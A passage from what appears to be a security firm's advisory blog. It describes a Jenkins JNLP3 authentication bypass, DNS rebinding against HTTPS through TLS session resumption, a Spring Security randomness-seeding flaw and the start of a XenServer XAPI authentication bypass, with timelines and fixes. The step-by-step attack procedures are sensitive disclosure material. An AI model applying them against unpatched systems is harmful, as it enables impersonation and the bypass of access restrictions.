It makes a lot of sense to us how this vulnerability could have been missed: people testing this will probably have focused on using untrusted domains for the redirect_uri. For example, sometimes it works to use or In this case those both fail, however, by trying just those you would miss the ability to use a malicious subdomain.

The video below illustrates the vulnerability.

Jenkins - authentication bypass

30 January 2020 at 00:00

During a short review of the Jenkins source code, we found a vulnerability that can be used to bypass the mutual authentication when using the JNLP3 remoting protocol. In particular, this allows anyone to impersonate a client and thereby gain access to the information and functionality that should only be available to that client.

Technical Background

Jenkins supports 4 different versions of the remoting protocol. 1 and 2 are unencrypted, 3 uses a custom handshake protocol and 4 is secured using TLS. The vulnerability exists only in version 3.

1, 2 and 3 are deprecated and warnings are shown when they are enabled. However, these warnings and the documentation only mention stability impact, no security impact, such as a lack of authentication.

As described in the documentation in the code, the JNLP3 handshake works as follows:


Client                                                                Master
          handshake ciphers = createFrom(agent name, agent secret)
  |                                                                     |
  |      initiate(agent name, encrypt(challenge), encrypt(cookie))      |
  |  -------------------------------------------------------------->>>  |
  |                                                                     |
  |                       encrypt(hash(challenge))                      |
  |  <<<--------------------------------------------------------------  |
  |                                                                     |
  |                          GREETING_SUCCESS                           |
  |  -------------------------------------------------------------->>>  |
  |                                                                     |
  |                         encrypt(challenge)                          |
  |  <<<--------------------------------------------------------------  |
  |                                                                     |
  |                       encrypt(hash(challenge))                      |
  |  -------------------------------------------------------------->>>  |
  |                                                                     |
  |                          GREETING_SUCCESS                           |
  |  <<<--------------------------------------------------------------  |
  |                                                                     |
  |                          encrypt(cookie)                            |
  |  <<<--------------------------------------------------------------  |
  |                                                                     |
  |                  encrypt(AES key) + encrypt(IvSpec)                 |
  |  -------------------------------------------------------------->>>  |
  |                                                                     |
             channel ciphers = createFrom(AES key, IvSpec)
          channel = channelBuilder.createWith(channel ciphers)

The encrypt function in this diagram uses keys that are derived from the client name and client secret. The exact procedure createFrom is not important for this issue, just that the keys only depend on the client name and secret and are therefore constant for all connections between that client and the master:


The encryption algorithm used is AES/CTR/PKCS5Padding:



As is commonly known, CTR mode must never be reused with the same keys and counter (IV): the encrypted value is generated by bytewise XORing a keystream with the plaintext data. When two different messages are encrypted using the same key and counter, the XOR of the two ciphertexts gives the XOR of the plaintexts as the keystream is canceled out. If one plaintext is known, this makes it possible to determine the keystream and the data in the second plaintext.

Each call to encrypt in the diagram above restarts the cipher, therefore, even when performing the handshake just once the keystream is reused multiple times.

Knowing the first ~2080 bytes of the AES-CTR keystream is enough to impersonate a client: the client needs to be able decrypt the server’s challenge, which is around 2080 bytes. All other packets are smaller than that.


There are a number of ways to trick the server into encrypting a known plaintext, which allows an attacker to recover a part of the keystream, which can then be used to decrypt other packets. We describe a relatively efficient approach below, but many different (possibly more efficient) approaches are likely to exist.

The client can send an initiate packet with the challenge as an empty string. This means that the response from the server will always be the encryption of the SHA-256 hash of the empty string. This allows the attacker to decrypt the initial bytes of the keystream.

Then, the attacker can obtain the rest of the keystream byte by byte in the following way: The attacker encrypts a message that is exactly as long as the keystream the attacker currently knows and appends one extra byte. The server will respond with one of 256 possible hashes, depending on how the extra byte was decrypted by the server. The attacker can decrypt the hash (because a large enough prefix is already known from the previous step) and determine which byte the server had used, which can be XORed with the ciphertext byte to obtain the next keystream byte.

There is one complication to this approach: in many places in the handshake binary data is for some unknown reason interpreted as ISO-8859-1 and converted to UTF8 or vice versa. This means that when the decrypted challenge ends in a character that is a partial UTF-8 multibyte sequence, the character is ignored. In that case, it is not possible to determine which character the server had decrypted. By trying at most 3 different bytes, it is possible to find one that is valid.

We have developed a proof-of-concept of this attack. Using this, we were able to retrieve enough bytes of the keystream to pass authentication with about 3000 connections to Jenkins, which took around 5 minutes against a local server. As mentioned, it is likely that this can be reduced even further.

It is also possible to perform a similar attack to impersonate a master against a client if the connection can be intercepted and the client automatically reconnects. We did not spend time performing this.


It is not possible to prevent this attack in a way that is backwards compatible with existing JNLP3 clients and masters. Therefore, we recommend removing support for JNLP3 completely. Arguably, JNLP1 and JNLP2 protocols are safer to use as those can only be taken over if a connection is intercepted. A safer encrypted alternative already exists (JNLP4), so investing time in fixing this protocol would not be needed.


We reported the issue to the Jenkins team, who coincidentally were already considering removing support for the version 1, 2 and 3 remoting protocols as they are deprecated and were known to have stability impact. These protocols have now been removed in Jenkins 2.219. In version 2.204.2 of the LTS releases of Jenkins, this protocol can still be enabled by setting a configuration flag, but this is strongly discouraged.

Users using an older version of Jenkins can mitigate this issue by not enabling version 3 of the remoting protocol.


2019-12-06 Issue reported to Jenkins as SECURITY-1682.
2019-12-06 Issue acknowledged by the Jenkins team.
2020-01-16 Fix prepared.
2020-01-29 Advisory published by Jenkins
2020-01-30 This advisory published by Computest.

DNS rebinding for HTTPS

25 November 2019 at 00:00

A DNS rebinding attack is possible against a server that uses HTTPS by abusing TLS session resumption in a specific way.

In addition, the implementation of the Extended Master Secret extension in SChannel contained a vulnerability that made it ineffective.

Technical background

A DNS rebinding attack works as follows: an attacker A waits for a user C to visit the attacker’s website, say attacker.example. The DNS record for attacker.example initially points to an IP address of the attacker with a low TTL. Once the page is loaded, JavaScript repeatedly attempts to communicate back to attacker.example using the XMLHttpRequest API. As this is in the same origin, the attacker can influence almost everything about the request and can read almost every part of the response.

The attacker then updates this DNS record to point to a different server (not owned by A) instead. This means that the requests intended for attacker.example end up at a different server after the record expires, say, server.example owned by S. If this server does not check the HTTP Host header of the request, then it may accept and process it.

The proper way to prevent this attack is to ensure that web servers verify that the Host header on every request matches a host that is in use by that server. Another workaround that is commonly recommended is to use HTTPS, as the attack as described does not work with HTTPS: when the DNS record is updated and C connects to server.example, C will notice that the server does not present a valid certificate for attacker.example, therefore the connection will be aborted.

The most interesting scenarios for this attack involve attacking a device on the network (or even on the local machine) of C. This is due to a number of reasons, one of which is the problems with HTTPS.


It is possible to perform a DNS rebinding attack to a HTTPS server by abusing TLS session resumption in a specific way. Contrary to the “normal” DNS rebinding attack, A needs to be able to communicate with S to establish a session that C will later resume. This attack is similar to the Triple-Handshake Attack 3SHAKE, however, the measures that were taken by TLS implementations in response to that attack do not adequately defend against this attack.

Just like in the 3SHAKE attack, A can set up two connections C -> A and A -> S that have the same encryption keys and then pass the session ID or session ticket from S on to C. This is known as an “Unknown Key-Share Attack”. Contrary to the 3SHAKE attack, however, A can update the DNS record for attacker.example before the session is resumed. TLS resumption does not re-transmit the certificate of the server, both endpoints will assume that the certificate is still the same as for the previous connection. Therefore, when C resumes the connection at S, C assumes it has an encrypted connection authenticated by attacker.example, while S assumes it has sent the certificate for server.example on this connection.

To any web applications running on S, the connection will appear to be originating from C’s IP address. If the website on server.example has functionality that is IP restricted to only be available to C, then A will be able to interact with this functionality on behalf of C.

In more detail:

  1. C opens a connection to A, using client random r1 in the ClientHello message.

  2. A opens a connection to S, using the same client random r1. A advertises only the ciphers C included that use RSA key exchange and A does not advertise the “extended master secret” TLS extension.

  3. S replies to A with server random r2 and session ID s in the ServerHello message.

  4. A replies to C with server random r2 and session ID s and the same cipher suite as chosen for the other connection, but A’s own certificate. A makes sure that the extended master secret extension is not enabled here either.

  5. C sends an encrypted pre-master secret to A. A decrypts this value using the private RSA key corresponding to A’s certificate to obtain its value, p.

  6. A also sends p in a ClientKeyExchange to S, now encrypted with the public key of S.

  7. Both connections finish. The master secret for both is derived only from r1, r2 and p. Therefore, they are identical. A knows this master secret, so it can cleanly finish both handshakes and exchange data on both connections.

  8. A sends a page containing JavaScript to C.

  9. A updates the DNS record for attacker.example to point to S’s IP address instead.

  10. A closes the connections with C and S.

  11. Due to an XHR request from A’s JavaScript, C will reconnect. It receives the new DNS record, therefore it resumes the connection at S, which will work as it recognises the session ID and the keys match. As it is a resumption, the certificate message is skipped.

  12. JavaScript from A can now send HTTP requests to S within the origin of attacker.example.

Cipher selection

A can force the use of a specific cipher suite on the first two connections, assuming both C and S support it. It can indicate support for only the desired cipher suite(s) on the connection A -> S and then select the same cipher suite on the C -> A connection.

When a session is resumed, the same cipher suite is used as the original connection did. Because A removed certain cipher suites, the ClientHello that is used for resumption will most certainly indicate stronger ciphers than the cipher the original connection had. A server could detect this and then decide to perform a full handshake instead, because this way a stronger cipher suite would be used. It appears that few servers actually do this.

Extended master secret

In response to the 3SHAKE attack, the extended master secret (EMS) extension was added to TLS in RFC 7627. This extension appears to be implemented by most browsers, however, support on servers is still limited. This extension would make the Unknown Key-Share attack impossible, as the full contents of the initial handshake messages (including the certificates) are included in the master secret computation, not just the random values.

The attack is impossible if both client and server support EMS and enforce its usage. However, as server support is limited (browser) clients currently do not require it.

When the extension is not required but supported by both the client and the server, it could be used to detect the above attack and refuse resumption (making the attack impossible as well). If the server receives a ClientHello that indicates support for EMS and which attempts to resume a session that did not use EMS, it must refuse to resume it and perform a full handshake instead.

This is described in RFC 7627 as follows:

 o  If the original session did not use the "extended_master_secret"
    extension but the new ClientHello contains the extension, then the
    server MUST NOT perform the abbreviated handshake.  Instead, it
    SHOULD continue with a full handshake (as described in
    Section 5.2) to negotiate a new session.

This is, however, not universally followed by servers. Most notably, we found that IIS indicates support for EMS in the full-handshake ServerHello, but when a ClientHello is received that indicates support for EMS that requests to resume a session that did not use EMS, IIS allows it to be resumed. We also found that servers hosted by the Fastly CDN were vulnerable in the same way.

The attack also works when the server does not support EMS, but the client does. The Interoperability Considerations in §5.4 of RFC 7627 only say the following about that:

 If a client or server chooses to continue an abbreviated handshake to
 resume a session that does not use the extended master secret, then
 the current connection becomes vulnerable to a man-in-the-middle
 handshake log synchronisation attack as described in Section 1.
 Hence, the client or server MUST NOT use the current handshake's
 "verify_data" for application-level authentication.  In particular,
 the client MUST disable renegotiation and any use of the "tls-unique"
 channel binding [RFC5929] on the current connection.

This section only highlights risks for renegotiation and channel binding on this connection. The ability to perform a DNS rebinding attack does not seem to have been considered here. To address that risk, the only option is to not resume connections for which EMS was not used and for which the remote IP address has changed.

Other configurations

The sequence of handshake messages is different when session tickets are used instead of ID-based resumption, but the attack still works in pretty much the same way.

While the example above used the RSA key exchange, as noted by the 3SHAKE attack the DHE or ECDHE key exchanges are also affected if the client accepts arbitrary DHE groups or ECDHE curves and does not verify that these are secure. Support for DHE is removed in all common browsers (except Firefox) and arbitrary ECDHE curves appears to never have been supported in browsers. When using Curve25519, certain “non-contributory” points can be used to force a specific shared secret. The TLS implementations we looked at correctly reject those points.

TLS 1.3 is not affected, as in that version the EMS extension is incorporated into the design.

SNI also influences the process. On the initial connection, the attacker can pick the name that is indicated for SNI. While a large portion of webservers is configured to reject unknown Host headers, almost no HTTPS servers were found that reject the handshake when an unknown SNI name is received, servers most often reply with a certain “default” certificate. We found that some servers require the SNI name for a resumption to be equal to the SNI name for the original connection. If this is not the case then it may be possible to change the selected virtual host based on the SNI name of the first connection, though we did not find a server configured like this in practice.

It may also be possible for A to send a client certificate to S on the first connection, and then attribute the messages sent after the resumption to A’s identity. We did not find a concrete attack that would be possible using this, but for other protocols that rely on TLS it may be an issue.

The attack as described relies on A updating their DNS record. Even with a minimal TTL, this may require a long time for all caches to obtain the updated record. This is not required for the attack: A can include two IP addresses in the in the A/AAAA record, the first being A’s own address, the second the address of the victim. Once A has delivered the JavaScript and session ID/ticket, A can reject connections from the user (by sending a TCP RST response), which means the browser will fall back to the second IP address, therefore connecting to S instead.


We wrote a tool to accept TLS connections and perform the attack by establishing a connection to a remote server with the same master secret and forwarding the session ID. By subsequently refusing connections, it was possible to cause browsers to resume its session at the remote server instead.

We have performed this attack successfully against the following browsers:

  • Safari 12.1.1 on macOS 10.14.5.
  • Chrome 74.0.3729.169 on macOS 10.14.5.
  • Safari on iOS 12.3.
  • Microsoft Edge 44.17763.1.0 on Windows 10.
  • Chrome 74.0.3729.169 on Windows 10.
  • Internet Explorer 11 on Windows 7.
  • Chrome 74.0.3729.61 on Android 10.

As mentioned, we also found the following server vulnerable to allowing a resumption of a non-EMS connection using an EMS ClientHello:

  • IIS 10.0.17763.1 on Windows 10.

Firefox is (currently) not vulnerable, as its TLS session storage separates sessions by remote IP address and will not attempt to resume if the IP address has changed. (


To summarise, this vulnerability can be used by an attacker to bypass IP restrictions on a web application, provided that the web server:

  • supports TLS session resumption;
  • does not support the EMS TLS extension (or does not enforce it, like IIS);
  • can be connected to by an attacker;
  • does not verify the Host header on requests or the targeted web application is the fallback virtual host;
  • has functionality that is restricted based on IP address.

As it cannot be determined automatically whether a website has functionality that is IP restricted, we could not determine the exact scale of vulnerable websites. Based on a scan of the top 1M most popular websites, we estimate that about 30% of webservers fulfil the first 2 requirements.


Chrome 77 will not allow TLS sessions to be resumed if the RSA key exchange is used and the remote IP address has changed.

SChannel (IE/Edge) in update KB4520003 will not allow TLS sessions to be resumed if EMS was not used and the implementation of EMS on the server was fixed to not allow non-EMS sessions to be resumed using an EMS-handshake.

Safari in macOS Catalina (10.15) will not allow TLS sessions to be resumed if the remote IP address has changed.

Fastly has fixed their TLS implementation to also not allow non-EMS sessions to be resumed using an EMS-handshake.

Due to these changes, servers may notice a decrease in the percentage of sessions that are successfully resumed. In order to maximise the chance of successful resumption, servers should make sure that:

  • Cipher suites using RSA key exchange are only used if ECDHE is not supported by the client.
  • The Extended Master Secret extension is supported and enabled by the server.
  • Clients connect to the same server IP address as much as possible, for example by ensuring the TTL of DNS responses is high if multiple IP addresses are used.

When using TLS 1.3, the RSA key exchange is no longer allowed and Extended Master Secret has become part of the design instead of an extension. Therefore, the first two recommendations are no longer needed.


2019-06-03 Report sent to Google, Apple, Microsoft.
2019-07-01 Fix committed for Chromium.
2019-07-15 EMS problem reported to Fastly.
2019-07-30 Fix by Fastly deployed and confirmed.
2019-09-11 Chrome 77 released with the fix.
2019-10-07 macOS Catalina released with the fix.
2019-10-08 Update KB4520003 released by Microsoft with the fix.

Spring Security - insufficient cryptographic randomness

4 July 2019 at 00:00

The SecureRandomFactoryBean class in Spring Security by Pivotal has a vulnerability in certain versions that could lead to the generation of predictable random values when a custom seed is supplied. This contradicted the documentation that states that adding a custom seed does not decrease the entropy. The cause of this bug is the use of the Java SecureRandom API in an incorrect way. This vulnerability could lead to predictable keys or tokens in applications that depend on cryptographically-secure randomness. This vulnerability was fixed by Pivotal by ensuring that the proper seeding always takes place.

Applications that use this class may need to evaluate if any predictable tokens were generated that should be revoked.

Technical Background

The SecureRandom class in Java offers a cryptographically secure pseudo-random number generator. It is often the best method in Java for generating keys, tokens or nonces for which unpredictability is critical. When using this class multiple algorithms may be available. An explicit algorithm can be selected by calling (for example) SecureRandom.getInstance("SHA1PRNG"). The seeding of an instance generated this way happens as soon as the first bytes are requested, not during creation.

Normally, when calling setSeed() on a SecureRandom instance the seed is incorporated into the state, to supplement its randomness. However, when calling setSeed() on a instance newly created with an explicit algorithm there is no state yet, therefore the seed will set the entire state and no other entropy is used.

This is mentioned in the documentation for SecureRandom.getInstance():

The returned SecureRandom object has not been seeded. To seed the returned
object, call the setSeed method. If setSeed is not called, the first call to
nextBytes will force the SecureRandom object to seed itself. This self-
seeding will not occur if setSeed was previously called.

This text is misleading, as the first two sentences may give the impression that the instance could be unsafe to use without seeding, while the self-seeding will in fact be much safer than supplying the seed for almost all applications.

This is a well known flaw in the design that can lead to incorrect use that has been discussed before:

You should never call setSeed before retrieving data from the "SHA1PRNG" in
the SUN provider as that will make your RNG (Random Number Generator) into a
Deterministic RNG - it will only use the given seed instead of adding the
seed to the state. In other words, it will always generate the same stream
of pseudo random bits or values.

Google noticed that on Android some apps depend on this unexpected usage, which made it difficult to change the behaviour.

A common but incorrect usage of this provider was to derive keys for
encryption by using a password as a seed. The implementation of SHA1PRNG had
a bug that made it deterministic if setSeed() was called before obtaining


The SecureRandomFactoryBean class in spring-security returns a SecureRandom object with SHA1PRNG as explicit provider. It is optionally possible to set a Resource as a seed:


public SecureRandom getObject() throws Exception {
    SecureRandom rnd = SecureRandom.getInstance(algorithm);

    if (seed != null) {
        // Seed specified, so use it
        byte[] seedBytes = FileCopyUtils.copyToByteArray(seed.getInputStream());
    else {
        // Request the next bytes, thus eagerly incurring the expense of default
        // seeding
        rnd.nextBytes(new byte[1]);

    return rnd;

The documentation of SecureRandomFactoryBean.setSeed() states (contradictory to the documentation of SecureRandom itself):

Allows the user to specify a resource which will act as a seed for the
SecureRandom instance. Specifically, the resource will be read into an
InputStream and those bytes presented to the SecureRandom.setSeed(byte[])
method. Note that this will simply supplement, rather than replace, the
existing seed. As such, it is always safe to set a seed using this method
(it never reduces randomness).

When used with a seed this means that a SecureRandom instance is generated in the vulnerable way as described above. In other words, the Resource entirely determines all output of this PRNG. If two different objects are created with the same seed then they will return identical output. The note in the documentation stating that it supplements the seed and can not reduce randomness was therefore false.


The easiest way to prevent this vulnerability would be to request the first byte even if a seed is set, before calling setSeed():

SecureRandom rnd = SecureRandom.getInstance(algorithm);

// Request the first byte, thus eagerly incurring the expense of default
// seeding and to prevent the seed from replacing the entire state.
rnd.nextBytes(new byte[1]);

if (seed != null) {
    // Seed specified, so use it
    byte[] seedBytes = FileCopyUtils.copyToByteArray(seed.getInputStream());

This, however, requires that no application depends on the current possibility of using SecureRandom fully deterministically.


Applications that use SecureRandomFactoryBean with a vulnerable version of Spring Security can mitigate this issue by not providing a seed with setSeed() or ensuring that the seed itself has sufficient entropy.


Pivotal responded quickly and fixed the issue in the recommended way in Spring Security. However, depending on the applications that use this library, keys or tokens which were generated using insufficient randomness may still exist and be in use. Applications that use SecureRandomFactoryBean should investigate if this may be the case and if any keys or tokens need to be revoked.

Applications that rely on using SecureRandomFactoryBean to generate deterministic sequences will no longer work and should switch to a proper key-derivation function.


2019-03-08 Report sent to [email protected].
2019-03-09 Reply from Pivotal that they confirmed the issue and are working on a fix.
2019-03-18 Fixed by Pivotal in revision 9c1eac79e2abb50f7b01e77c2418566f2a30532f.
2019-04-02 Vulnerability report published by Pivotal.
2019-04-03 Spring Security 5.1.5, 5.0.12, 4.2.12 released with the fix.
2019-07-04 Advisory published by Computest.

XenServer - path traversal leading to authentication bypass

14 August 2018 at 00:00

During a brief code review of XenServer, Computest found and exploited a vulnerability in the XAPI management service that allows an attacker to bypass authentication and remotely perform arbitrary XAPI calls with administrative privileges.

This vulnerability can be further exploited to execute arbitrary shell commands as the operating system “root” user on the Dom0 virtual machine. The Dom0 is the component that manages the hypervisor, and has full control over all the virtual machines as well as the network and storage resources attached to the system.

To exploit this vulnerability an attacker has to be on a network that can reach one of the IPs and ports the XAPI service is available on (port numbers are 80 and 443 by default). Alternatively they can perform the attack through the browser of a user who has access to this port, via either a DNS rebinding attack or possibly by using the primary vulnerability to mount a cross-site scripting attack by using it to read a logfile containing attacker-controlled HTML.

This was not a full audit and further issues may or may not be present.

About XenServer and XAPI

About XenServer:

XenServer is the leading open source virtualization platform, powered by the Xen Project hypervisor and the XAPI toolstack. It is used in the world’s largest clouds and enterprises.

Technical support for XenServer is available from Citrix.


About XAPI:

The Xen Project Management API (XAPI) is:

  • A Xen Project Toolstack that exposes the XAPI interface. When we refer to XAPI as a toolstack, we typically include all dependencies and components that are needed for XAPI to operate (e.g. xenopsd).
  • An interface for remotely configuring and controlling virtualised guests running on a Xen-enabled host. XAPI is the core component of XenServer and XCP.


While XAPI is maintained by the Xen project, it is not a required component of all Xen-based systems. It is required in XenServer.

Technical Background

Virtual machines have become the platform of choice for nearly all new IT infrastructure because of the massive benefits in manageability and resource optimization. However, a virtual machine can only be as secure as the platform it runs on.

For this reason compromising a hypervisor is always a high priority target, both during penetration tests and for real attackers.

The XAPI toolstack provides an API interface that is used both for communication between nodes in the same pool and for managing the pool, for example using a desktop application such as XenCenter. It is also the backend used by command line tools such as ‘xe’ and can be used by management platforms such as OpenStack, CloudStack, and Xen Orchestra.

Availability of the XAPI port, and vulnerability to DNS rebinding

While Citrix recommends keeping management traffic separate from storage traffic and VM traffic, in practice the system is often not configured this way. By default, the XAPI service appears to listen on any IP assigned to the hypervisor (actually the Dom0, to be precise). If no external interface is selected as a management interface, the XAPI service may still be accessible through one or more host internal management networks which can be made available to VMs.

The XAPI service is available both over unencrypted HTTP on port 80 and over HTTPS on port 443 (with a self-signed certificate by default).

The service does not check the HTTP Host header specified in requests, which makes the service vulnerable to DNS rebinding attacks. Using a DNS rebinding attack a remote attacker can reach a XAPI service on the internal network by convincing a user on the internal network to visit a malicious website, without needing to exploit any vulnerability in the web browser or client OS.

Either way, because of the importance of a hypervisor it still needs to be able to defend against attackers who have already gained access to internal networks.

Authentication and request handling in XAPI

In assessing the XAPI we started by identifying the parts of the code where authentication checks are performed. All code is available on GitHub.

The first thing to note is that API endpoints are registered using add_handler in the file /ocaml/xapi/

let add_handler (name, handler) =

let action =
  try List.assoc name Datamodel.http_actions
  with Not_found ->
    (* This should only affect developers: *)
    error "HTTP handler %s not registered in ocaml/idl/" name;
    failwith (Printf.sprintf "Unregistered HTTP handler: %s" name) in
let check_rbac = Rbac.is_rbac_enabled_for_http_action name in

let h = match handler with
  | Http_svr.BufIO callback ->
    Http_svr.BufIO (fun req ic context ->
           if check_rbac
           then (* rbac checks *)
                assert_credentials_ok name req ~fn:(fun () -> callback req ic context) (Buf_io.fd_of ic)
              with e ->
                debug "Leaving RBAC-handler in xapi_http after: %s" (ExnHelper.string_of_exn e);
                raise e
           else (* no rbac checks *)
             callback req ic context

So in short: if Rbac.is_rbac_enabled_for_http_action returns true, authentication is not needed. Otherwise assert_credentials is called, which will throw an exception if the request is not authorized.

Looking into is_rbac_enabled_for_http_action a bit more, the following endpoints are exempted from authentication:

(* these public http actions will NOT be checked by RBAC *)
(* they are meant to be used in exceptional cases where RBAC is already *)
(* checked inside them, such as in the XMLRPC (API) calls *)
let public_http_actions_with_no_rbac_check =
    "post_root"; (* XMLRPC (API) calls -> checks RBAC internally *)